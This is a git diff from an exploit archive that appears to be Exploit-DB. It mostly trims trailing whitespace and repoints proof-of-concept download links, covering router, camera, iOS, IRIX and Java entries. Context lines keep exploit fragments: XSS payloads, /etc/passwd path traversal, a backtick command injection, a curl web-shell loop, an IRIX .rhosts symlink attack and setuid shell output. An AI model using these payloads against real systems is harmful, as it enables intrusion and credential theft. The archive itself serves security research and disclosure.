-49,5 +49,4 @@ onclick=prompt(1)>XSS # # More information can be found at: -http://www.nerdbox.it/ubee-evw3200-multiple-vulnerabilities/ - +http://www.nerdbox.it/ubee-evw3200-multiple-vulnerabilities/ \ No newline at end of file diff --git a/exploits/hardware/webapps/32883.txt b/exploits/hardware/webapps/32883.txt index b57325cd5..cc5a620a1 100644 --- a/exploits/hardware/webapps/32883.txt +++ b/exploits/hardware/webapps/32883.txt @@ -95,10 +95,4 @@ wndr3400: 10198 for wndr3400 -****************************************************************************************************************************** - - - - - - +****************************************************************************************************************************** \ No newline at end of file diff --git a/exploits/hardware/webapps/33138.txt b/exploits/hardware/webapps/33138.txt index 45f0136fa..7be89eba5 100644 --- a/exploits/hardware/webapps/33138.txt +++ b/exploits/hardware/webapps/33138.txt @@ -38,5 +38,4 @@ Steps to reproduce / PoC: 5. in "QoS Policy for: " Enter the following: and click apply. 6. go to another page and navigate back into QoS - the XSS error pops up. - - PoC Video: https://www.youtube.com/watch?v=xxjluF2RR70 - + - PoC Video: https://www.youtube.com/watch?v=xxjluF2RR70 \ No newline at end of file diff --git a/exploits/hardware/webapps/34254.txt b/exploits/hardware/webapps/34254.txt index a061f38aa..76164f8c4 100644 --- a/exploits/hardware/webapps/34254.txt +++ b/exploits/hardware/webapps/34254.txt @@ -7,7 +7,7 @@ # Tested on: TP-Link TL-WR740N v4 Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34254.7z (Password: TP-P0wned-Link) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34254.7z (Password: TP-P0wned-Link) Vulnerability description: The domain name parameters of the "Parental Control" and "Access diff --git a/exploits/hardware/webapps/35933.txt b/exploits/hardware/webapps/35933.txt index 6a12d3915..e980ca0f3 100644 --- a/exploits/hardware/webapps/35933.txt +++ b/exploits/hardware/webapps/35933.txt @@ -47,5 +47,4 @@ http://127.0.0.1/fw/index2.do?completeData=true&url=importedLogDetails" onmouseo Sobhan system Co. Signal Network And Security Group (www.signal-net.net) -E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net - +E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net \ No newline at end of file diff --git a/exploits/hardware/webapps/38004.txt b/exploits/hardware/webapps/38004.txt index f4e541a43..5e17b0934 100644 --- a/exploits/hardware/webapps/38004.txt +++ b/exploits/hardware/webapps/38004.txt @@ -90,6 +90,4 @@ http://downloadcenter.samsung.com/content/FM/201508/20150825112233867/SCX583 Shad Malloy -Secure Network Management, LLC - - +Secure Network Management, LLC \ No newline at end of file diff --git a/exploits/hardware/webapps/38369.txt b/exploits/hardware/webapps/38369.txt index 7939c3fc3..2c3a1ab62 100644 --- a/exploits/hardware/webapps/38369.txt +++ b/exploits/hardware/webapps/38369.txt @@ -96,4 +96,4 @@ Set-Cookie: HcsoB=60cd4a687de94857; path=/; 0x478e0x000000001TCP 0x40 - + \ No newline at end of file diff --git a/exploits/hardware/webapps/38514.py b/exploits/hardware/webapps/38514.py index 87cb3dae5..78d9d82ef 100755 --- a/exploits/hardware/webapps/38514.py +++ b/exploits/hardware/webapps/38514.py @@ -211,4 +211,4 @@ else: else: print 'Please choose a sensible input next time, exiting.' input('Press Enter to continue...') - sys.exit() + sys.exit() \ No newline at end of file diff --git a/exploits/hardware/webapps/39716.py b/exploits/hardware/webapps/39716.py index d4ace98fc..a9d725fab 100755 --- a/exploits/hardware/webapps/39716.py +++ b/exploits/hardware/webapps/39716.py @@ -220,4 +220,4 @@ while(1): if cmd.strip() != "quit" : sendcmd(cmd) else : - sys.exit() + sys.exit() \ No newline at end of file diff --git a/exploits/hardware/webapps/40276.txt b/exploits/hardware/webapps/40276.txt index aa8923be8..47cc7f45d 100644 --- a/exploits/hardware/webapps/40276.txt +++ b/exploits/hardware/webapps/40276.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40276.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40276.zip \ No newline at end of file diff --git a/exploits/hardware/webapps/40690.txt b/exploits/hardware/webapps/40690.txt index e5e5fbab5..eb3e05b01 100644 --- a/exploits/hardware/webapps/40690.txt +++ b/exploits/hardware/webapps/40690.txt @@ -81,4 +81,4 @@ Have had no further contact with them, unable to get a CVE assigned for this, pr Full Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40690.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40690.zip \ No newline at end of file diff --git a/exploits/hardware/webapps/41829.txt b/exploits/hardware/webapps/41829.txt index fd5e27f58..f4609a934 100644 --- a/exploits/hardware/webapps/41829.txt +++ b/exploits/hardware/webapps/41829.txt @@ -114,4 +114,4 @@ DISCLAIMER INFO All content of this advisory is Copyright (C) 2017 Bitcrack Cyber Security, and are licensed under a Creative Commons Attribution Non-Commercial 3.0 (South Africa) License: http://za.creativecommons.org/ and other countries as and when -stipulated. +stipulated. \ No newline at end of file diff --git a/exploits/hardware/webapps/42547.py b/exploits/hardware/webapps/42547.py index 0c708984e..5ad1e8d44 100755 --- a/exploits/hardware/webapps/42547.py +++ b/exploits/hardware/webapps/42547.py @@ -61,4 +61,4 @@ fd = raw_input('[+] File or Directory: aka /etc/passwd and etc..\n') print "Exploiting....." print '\n' URL = "http://" + ip_add + "/cgi-bin/webproc?getpage=/" + fd + "&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:login=true&var:page=wizard" -print urllib2.urlopen(URL).read() +print urllib2.urlopen(URL).read() \ No newline at end of file diff --git a/exploits/hardware/webapps/42588.txt b/exploits/hardware/webapps/42588.txt index 02461cbd6..fc16fd413 100644 --- a/exploits/hardware/webapps/42588.txt +++ b/exploits/hardware/webapps/42588.txt @@ -114,4 +114,4 @@ User3.privilege=2 The vendor has been contacted and the firmware was updated. See disclosure in: -https://www.brickcom.com/news/productCERT_security_advisorie.php +https://www.brickcom.com/news/productCERT_security_advisorie.php \ No newline at end of file diff --git a/exploits/hardware/webapps/42608.txt b/exploits/hardware/webapps/42608.txt index 524d999be..6f9cc10ea 100644 --- a/exploits/hardware/webapps/42608.txt +++ b/exploits/hardware/webapps/42608.txt @@ -30,4 +30,4 @@ sys_UserName=admin; expires=Mon, 31-Jan-2112 16:00:00 GMT; language=en_us" 29/4/2017 – Vulnerability Discovered. 29/4/2017 - Vendor not responding. -03/09/2017 – Exploit published. +03/09/2017 – Exploit published. \ No newline at end of file diff --git a/exploits/hardware/webapps/42633.txt b/exploits/hardware/webapps/42633.txt index 67d97ef34..cc7a2a86c 100644 --- a/exploits/hardware/webapps/42633.txt +++ b/exploits/hardware/webapps/42633.txt @@ -34,4 +34,4 @@ rawFile.onreadystatechange = function() { }; rawFile.open("GET", "http://10.0.0.1/userRpm/WlanSecurityRpm.htm", true); //pega a source da página /popupSiteSurveyRpm.htm -rawFile.send(); +rawFile.send(); \ No newline at end of file diff --git a/exploits/hardware/webapps/42634.txt b/exploits/hardware/webapps/42634.txt index eb0af214c..a01ac5763 100644 --- a/exploits/hardware/webapps/42634.txt +++ b/exploits/hardware/webapps/42634.txt @@ -20,4 +20,4 @@ http://192.168.1.1/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd https://www.linkedin.com/in/ahmet-mersin-177398b0/ -@gaissecurity +@gaissecurity \ No newline at end of file diff --git a/exploits/hardware/webapps/42649.txt b/exploits/hardware/webapps/42649.txt index 611f6d0c8..2d1c88b4f 100644 --- a/exploits/hardware/webapps/42649.txt +++ b/exploits/hardware/webapps/42649.txt @@ -132,4 +132,4 @@ match your new configuration. Credits: ======= -Ibad Shah, Taimooor Zafar, Owais Mehtab +Ibad Shah, Taimooor Zafar, Owais Mehtab \ No newline at end of file diff --git a/exploits/hardware/webapps/42732.py b/exploits/hardware/webapps/42732.py index 913229dbb..794687616 100755 --- a/exploits/hardware/webapps/42732.py +++ b/exploits/hardware/webapps/42732.py @@ -53,4 +53,4 @@ def main(): if __name__ == '__main__': - main() + main() \ No newline at end of file diff --git a/exploits/hardware/webapps/42785.sh b/exploits/hardware/webapps/42785.sh index 2d5f70f83..64b602af9 100755 --- a/exploits/hardware/webapps/42785.sh +++ b/exploits/hardware/webapps/42785.sh @@ -98,4 +98,4 @@ while true; do echo -ne "\\033[00m"; shell="http://$ip:$port/maintenance/test.php?c=${cmd// /+}" curl "$shell" -done +done \ No newline at end of file diff --git a/exploits/hardware/webapps/42786.txt b/exploits/hardware/webapps/42786.txt index 97f079666..655f55814 100644 --- a/exploits/hardware/webapps/42786.txt +++ b/exploits/hardware/webapps/42786.txt @@ -370,4 +370,4 @@ Product info: http://TARGET/api/system/config/product -{"product":{"name":"generic","sensors":[{"type":"optronic","max":1,"devices":[{"type":"video","text":{"default":"Video"},"max":4,"drivers":["uFLIRish Bullet Video","uFLIRish Bullet Video Snap","uFLIRish Bullet Video Web"]},{"type":"interface","text":{"default":"VMS Remote"},"max":3,"drivers":["Nexus CGI Interface","ONVIF v2.0","Lenel Interface"]},{"type":"ir","text":{"default":"IR"},"max":1,"drivers":["FLIR Tau v2.x","FLIR Radiometric Tau"]},{"type":"plat","text":{"default":"Pan & Tilt"},"max":1,"drivers":["Fixed Mount P&T"]},{"type":"io","text":{"default":"GPIO"},"max":1,"drivers":["Linux GPIO File Handle"]},{"type":"osd","text":{"default":"OSD"},"max":1,"drivers":["OSD uFLIRish"]},{"type":"alarm_manager","text":{"default":"Alarm Manager"},"max":1,"drivers":["Alarm Manager v3.0"]},{"type":"geo","text":{"default":"Georeference"},"max":1,"drivers":["Georeference"]}]}],"maxSensors":1,"maxDevices":255,"ports":[{"id":"\/dev\/ttyp0","text":{"default":"VIPE Video"}},{"id":"\/dev\/ttyS1","text":{"default":"CAM"}}],"aseriesfirmware":false,"mcufirmware":false,"sffc":false,"rescueMode":false},"sections":[{"type":"networking","text":{"default":"Networking"}}]} +{"product":{"name":"generic","sensors":[{"type":"optronic","max":1,"devices":[{"type":"video","text":{"default":"Video"},"max":4,"drivers":["uFLIRish Bullet Video","uFLIRish Bullet Video Snap","uFLIRish Bullet Video Web"]},{"type":"interface","text":{"default":"VMS Remote"},"max":3,"drivers":["Nexus CGI Interface","ONVIF v2.0","Lenel Interface"]},{"type":"ir","text":{"default":"IR"},"max":1,"drivers":["FLIR Tau v2.x","FLIR Radiometric Tau"]},{"type":"plat","text":{"default":"Pan & Tilt"},"max":1,"drivers":["Fixed Mount P&T"]},{"type":"io","text":{"default":"GPIO"},"max":1,"drivers":["Linux GPIO File Handle"]},{"type":"osd","text":{"default":"OSD"},"max":1,"drivers":["OSD uFLIRish"]},{"type":"alarm_manager","text":{"default":"Alarm Manager"},"max":1,"drivers":["Alarm Manager v3.0"]},{"type":"geo","text":{"default":"Georeference"},"max":1,"drivers":["Georeference"]}]}],"maxSensors":1,"maxDevices":255,"ports":[{"id":"\/dev\/ttyp0","text":{"default":"VIPE Video"}},{"id":"\/dev\/ttyS1","text":{"default":"CAM"}}],"aseriesfirmware":false,"mcufirmware":false,"sffc":false,"rescueMode":false},"sections":[{"type":"networking","text":{"default":"Networking"}}]} \ No newline at end of file diff --git a/exploits/hardware/webapps/42788.txt b/exploits/hardware/webapps/42788.txt index 8695707ac..395b70731 100644 --- a/exploits/hardware/webapps/42788.txt +++ b/exploits/hardware/webapps/42788.txt @@ -57,4 +57,4 @@ Accept-Language: en-US,en;q=0.8,mk;q=0.6 Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b Connection: close -dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60sleep%2017%60 +dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60sleep%2017%60 \ No newline at end of file diff --git a/exploits/hardware/webapps/42789.txt b/exploits/hardware/webapps/42789.txt index da6194e64..aeabf5f9e 100644 --- a/exploits/hardware/webapps/42789.txt +++ b/exploits/hardware/webapps/42789.txt @@ -48,4 +48,4 @@ Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5435.php PoC: http://TARGET:8081/graphics/livevideo/stream/stream3.jpg -http://TARGET:8081/graphics/livevideo/stream/stream1.jpg +http://TARGET:8081/graphics/livevideo/stream/stream1.jpg \ No newline at end of file diff --git a/exploits/hardware/webapps/42916.py b/exploits/hardware/webapps/42916.py index 5afffc4c7..7dbd67da4 100755 --- a/exploits/hardware/webapps/42916.py +++ b/exploits/hardware/webapps/42916.py @@ -28,4 +28,4 @@ url = "http://10.0.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg" header = {'Cookie': 'admin:language=pt'} #setando o cookie no header r = get(url, headers=header).text -print(r) +print(r) \ No newline at end of file diff --git a/exploits/hardware/webapps/42931.txt b/exploits/hardware/webapps/42931.txt index d2d28cea7..022d8a1c9 100644 --- a/exploits/hardware/webapps/42931.txt +++ b/exploits/hardware/webapps/42931.txt @@ -23,4 +23,4 @@ words). And go url: http://dvr-domain.dynns.com:XX/doc/page/main.asp. It will Authentication Bypass 3. Solution: -Update to Firmware version V3.0.0 build20170925 +Update to Firmware version V3.0.0 build20170925 \ No newline at end of file diff --git a/exploits/hardware/webapps/42947.txt b/exploits/hardware/webapps/42947.txt index deb496efb..7ecbf2d5e 100644 --- a/exploits/hardware/webapps/42947.txt +++ b/exploits/hardware/webapps/42947.txt @@ -35,4 +35,4 @@ PING 127.0.0.1 (127.0.0.1): 56 data bytes 5 packets transmitted, 5 packets received, 0% packet loss round-trip min/avg/max = 0.214/0.304/0.617 ms root -uid=0(root) gid=0 groups=0 +uid=0(root) gid=0 groups=0 \ No newline at end of file diff --git a/exploits/hardware/webapps/42986.txt b/exploits/hardware/webapps/42986.txt index cd07fa252..0d3848b4e 100644 --- a/exploits/hardware/webapps/42986.txt +++ b/exploits/hardware/webapps/42986.txt @@ -19,7 +19,4 @@ PoC: - Then put the script () -- Xss Vulnerability - - - +- Xss Vulnerability \ No newline at end of file diff --git a/exploits/hardware/webapps/44864.py b/exploits/hardware/webapps/44864.py index 38274c202..bb2231ba5 100755 --- a/exploits/hardware/webapps/44864.py +++ b/exploits/hardware/webapps/44864.py @@ -29,4 +29,4 @@ s.send('POST /login.htm HTTP/1.1\r\n') s.send('command=login&username=' + payload + '&password=PoC\r\n\r\n') s.recv(1024) s.close() -print "\nExploit complete!" +print "\nExploit complete!" \ No newline at end of file diff --git a/exploits/hardware/webapps/45526.txt b/exploits/hardware/webapps/45526.txt index eb159e3d6..f705e7a90 100644 --- a/exploits/hardware/webapps/45526.txt +++ b/exploits/hardware/webapps/45526.txt @@ -28,4 +28,4 @@ Content-Length: 209 Cookie: risessionid=125831398474617; cookieOnOffChecker=on; wimsesid=911065987 Connection: close -mode=ADDUSER&step=BASE&wimToken=847703007&entryIndexIn=00002&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryReadNameIn=&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1 +mode=ADDUSER&step=BASE&wimToken=847703007&entryIndexIn=00002&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryReadNameIn=&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1 \ No newline at end of file diff --git a/exploits/hardware/webapps/46263.txt b/exploits/hardware/webapps/46263.txt index 8b48f19a0..15c07013f 100644 --- a/exploits/hardware/webapps/46263.txt +++ b/exploits/hardware/webapps/46263.txt @@ -27,4 +27,4 @@ Upgrade to version 6.3.0 For more information about fixed software releases, consult the Cisco bug ID CSCvk30983 4. Reference: -https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-frpwr-mc-xss +https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-frpwr-mc-xss \ No newline at end of file diff --git a/exploits/hardware/webapps/47893.js b/exploits/hardware/webapps/47893.js index 1bfd9db7d..5fd2ea3e8 100644 --- a/exploits/hardware/webapps/47893.js +++ b/exploits/hardware/webapps/47893.js @@ -10,7 +10,7 @@ Obtains addrof/fakeobj and arbitrary read/write primitives. Supports PS4 consoles on 6.XX. May also work on older firmware versions, but I am not sure. Bug was fixed in firmware 7.00. -EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47893.zip +EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47893.zip */ diff --git a/exploits/hardware/webapps/48588.py b/exploits/hardware/webapps/48588.py index c3b7967a0..2c414a945 100755 --- a/exploits/hardware/webapps/48588.py +++ b/exploits/hardware/webapps/48588.py @@ -1,4 +1,4 @@ -# EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48588.zip +# EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48588.zip # # Exploits a pre-authentication memcpy based stack buffer overflow vulnerability # in httpd on several devices and versions: diff --git a/exploits/ios/dos/39359.txt b/exploits/ios/dos/39359.txt index 7d7d546c1..8bf059cdc 100644 --- a/exploits/ios/dos/39359.txt +++ b/exploits/ios/dos/39359.txt @@ -6,4 +6,4 @@ OS X advisory: https://support.apple.com/en-us/HT205731 iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39359.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39359.zip \ No newline at end of file diff --git a/exploits/ios/dos/39360.txt b/exploits/ios/dos/39360.txt index 5ac77b3a1..8a7cccbc7 100644 --- a/exploits/ios/dos/39360.txt +++ b/exploits/ios/dos/39360.txt @@ -7,4 +7,4 @@ iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39360.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39360.zip \ No newline at end of file diff --git a/exploits/ios/dos/39361.txt b/exploits/ios/dos/39361.txt index 233701d8e..9050556dc 100644 --- a/exploits/ios/dos/39361.txt +++ b/exploits/ios/dos/39361.txt @@ -7,4 +7,4 @@ iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39361.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39361.zip \ No newline at end of file diff --git a/exploits/ios/dos/39362.txt b/exploits/ios/dos/39362.txt index 8c78c2819..a0ec4691a 100644 --- a/exploits/ios/dos/39362.txt +++ b/exploits/ios/dos/39362.txt @@ -7,4 +7,4 @@ iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39362.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39362.zip \ No newline at end of file diff --git a/exploits/ios/dos/39363.txt b/exploits/ios/dos/39363.txt index 1af8133a3..0469cd940 100644 --- a/exploits/ios/dos/39363.txt +++ b/exploits/ios/dos/39363.txt @@ -7,4 +7,4 @@ iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39363.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39363.zip \ No newline at end of file diff --git a/exploits/ios/dos/39364.txt b/exploits/ios/dos/39364.txt index 1795794ac..eda975f19 100644 --- a/exploits/ios/dos/39364.txt +++ b/exploits/ios/dos/39364.txt @@ -7,4 +7,4 @@ iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39364.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39364.zip \ No newline at end of file diff --git a/exploits/ios/dos/40906.txt b/exploits/ios/dos/40906.txt index bb865e327..748769a98 100644 --- a/exploits/ios/dos/40906.txt +++ b/exploits/ios/dos/40906.txt @@ -109,7 +109,7 @@ or https://cert.cx/appleios10/expl.html just click on this link by using Safari. EDB Proofs of Concept Mirror: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40906.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40906.zip -------------------------------------------------------------------------------------- 5. Safari and sandbox diff --git a/exploits/ios/dos/42014.txt b/exploits/ios/dos/42014.txt index 359c253fb..050d98633 100644 --- a/exploits/ios/dos/42014.txt +++ b/exploits/ios/dos/42014.txt @@ -131,4 +131,4 @@ localNotification.soundName = UILocalNotificationDefaultSoundName; Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42014.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42014.zip \ No newline at end of file diff --git a/exploits/ios/dos/45649.txt b/exploits/ios/dos/45649.txt index 0454ed266..094bf4a30 100644 --- a/exploits/ios/dos/45649.txt +++ b/exploits/ios/dos/45649.txt @@ -55,4 +55,4 @@ Here's a code snippet from sleh.c with the second level exception handler for un Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45649.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45649.zip \ No newline at end of file diff --git a/exploits/ios/dos/45786.txt b/exploits/ios/dos/45786.txt index 0f400b455..621787234 100644 --- a/exploits/ios/dos/45786.txt +++ b/exploits/ios/dos/45786.txt @@ -11,4 +11,4 @@ The issue can be reproduced using the attached sequence of RTP packets. To repro Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45786.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45786.zip \ No newline at end of file diff --git a/exploits/ios/dos/46913.txt b/exploits/ios/dos/46913.txt index 80c68e215..6ffabe96a 100644 --- a/exploits/ios/dos/46913.txt +++ b/exploits/ios/dos/46913.txt @@ -24,4 +24,4 @@ This issue was fixed on Tuesday, May 14 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46913.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46913.zip \ No newline at end of file diff --git a/exploits/ios/dos/47415.txt b/exploits/ios/dos/47415.txt index ca925862b..415e98fe4 100644 --- a/exploits/ios/dos/47415.txt +++ b/exploits/ios/dos/47415.txt @@ -31,4 +31,4 @@ The NSSharedDictionary initWithCoder implementation is very complex and greatly Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47415.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47415.zip \ No newline at end of file diff --git a/exploits/ios/dos/47694.txt b/exploits/ios/dos/47694.txt index 45e6b219f..7c87622c5 100644 --- a/exploits/ios/dos/47694.txt +++ b/exploits/ios/dos/47694.txt @@ -52,4 +52,4 @@ Tested on iOS 12.4 (16G77) on iPod touch 6G Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47694.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47694.zip \ No newline at end of file diff --git a/exploits/ios/local/14538.txt b/exploits/ios/local/14538.txt index 2ef23bf4c..bbfc43cc4 100644 --- a/exploits/ios/local/14538.txt +++ b/exploits/ios/local/14538.txt @@ -1,3 +1,3 @@ The files contained in the archive link below are those that make use of a pdf exploit in order to jailbreak devices running Apple iOS. These pdf's are of interest in that they originate in userland and give root access to the devices. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14538.7z (ios_pdf_exploit.7z) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14538.7z (ios_pdf_exploit.7z) \ No newline at end of file diff --git a/exploits/ios/local/42555.txt b/exploits/ios/local/42555.txt index 9fdc0be78..da9b168c5 100644 --- a/exploits/ios/local/42555.txt +++ b/exploits/ios/local/42555.txt @@ -35,4 +35,4 @@ Credit for finding the vulnerabilities, chaining them together, writing the expl Proof of Concept: https://github.com/doadam/ziVA -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42555.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42555.zip \ No newline at end of file diff --git a/exploits/ios/remote/28081.txt b/exploits/ios/remote/28081.txt index 8a758e938..1331043d8 100644 --- a/exploits/ios/remote/28081.txt +++ b/exploits/ios/remote/28081.txt @@ -54,7 +54,7 @@ into the JS code). The full exploit code is available here: http://packetstormsecurity.com/files/123088/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28081.tgz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28081.tgz +------------------------------------------------------------------------------+ diff --git a/exploits/ios/remote/34399.txt b/exploits/ios/remote/34399.txt index ac496f041..68f384977 100644 --- a/exploits/ios/remote/34399.txt +++ b/exploits/ios/remote/34399.txt @@ -81,26 +81,4 @@ We can look for all the memos by incrementing the value of "id" -#SaMaN(@samanL33T) - - - - - - - - - - - - - - - - - - - - - - +#SaMaN(@samanL33T) \ No newline at end of file diff --git a/exploits/ios/remote/42784.txt b/exploits/ios/remote/42784.txt index b8809006e..5d1a82a3d 100644 --- a/exploits/ios/remote/42784.txt +++ b/exploits/ios/remote/42784.txt @@ -32,4 +32,4 @@ Following the steps above should result in installation of a simple backdoor all Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42784.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42784.zip \ No newline at end of file diff --git a/exploits/ios/remote/42996.txt b/exploits/ios/remote/42996.txt index 8ddf10236..7f56cdbf3 100644 --- a/exploits/ios/remote/42996.txt +++ b/exploits/ios/remote/42996.txt @@ -33,4 +33,4 @@ Following the steps above should result in DART's descriptor being mapped into I Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42996.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42996.zip \ No newline at end of file diff --git a/exploits/ios/remote/4522.html b/exploits/ios/remote/4522.html index 56f28ec05..6f7078717 100644 --- a/exploits/ios/remote/4522.html +++ b/exploits/ios/remote/4522.html @@ -27,7 +27,7 @@ EDB Note: Old filename: 10112007-iphone.tif --> - + # milw0rm.com [2007-10-11] \ No newline at end of file diff --git a/exploits/irix/local/19210.txt b/exploits/irix/local/19210.txt index 93a0a9dc5..25db0dee8 100644 --- a/exploits/irix/local/19210.txt +++ b/exploits/irix/local/19210.txt @@ -18,4 +18,4 @@ under the midikeys window click sounds and then midi songs. This will open a fil You can enter the path and filename of files you which to read, including root owned with group/world read/write permissions unset. -If you select a file like "/usr/share/data/music/README" it will appear in a text editor. Use the text editor to open /etc/passwd and make modifications at will. Save and enjoy. +If you select a file like "/usr/share/data/music/README" it will appear in a text editor. Use the text editor to open /etc/passwd and make modifications at will. Save and enjoy. \ No newline at end of file diff --git a/exploits/irix/local/19280.txt b/exploits/irix/local/19280.txt index fec8ef546..1959fdf98 100644 --- a/exploits/irix/local/19280.txt +++ b/exploits/irix/local/19280.txt @@ -34,7 +34,4 @@ cd /tmp ln -s /.rhosts fsdump.dir /var/rfindd/fsdump -Fgimme / ls -al /.rhosts -rm -f fsdump.dir fsdump.pag gimme - - - +rm -f fsdump.dir fsdump.pag gimme \ No newline at end of file diff --git a/exploits/irix/local/19353.txt b/exploits/irix/local/19353.txt index 07fcb901a..de75ae7f2 100644 --- a/exploits/irix/local/19353.txt +++ b/exploits/irix/local/19353.txt @@ -20,7 +20,4 @@ execl("/sbin/suid_exec","/bin/su","/bin/su",0); % ./expl Too many ('s. % ls -l /tmp/sh --r-sr-sr-x 1 root sys 140784 Dec 2 19:21 /tmp/sh* - - - +-r-sr-sr-x 1 root sys 140784 Dec 2 19:21 /tmp/sh* \ No newline at end of file diff --git a/exploits/java/dos/41965.txt b/exploits/java/dos/41965.txt index a6599b310..1a03e1d49 100644 --- a/exploits/java/dos/41965.txt +++ b/exploits/java/dos/41965.txt @@ -21,4 +21,4 @@ The second step is to change python script jenkins_poc1.py: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41965.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41965.zip \ No newline at end of file diff --git a/exploits/java/dos/46409.txt b/exploits/java/dos/46409.txt index a1202846e..e8958a67d 100644 --- a/exploits/java/dos/46409.txt +++ b/exploits/java/dos/46409.txt @@ -91,4 +91,4 @@ Attached with this report are three mutated testcases, and a simple Java program Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46409.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46409.zip \ No newline at end of file diff --git a/exploits/java/dos/46410.txt b/exploits/java/dos/46410.txt index e5bc6f5b0..1a9e975f3 100644 --- a/exploits/java/dos/46410.txt +++ 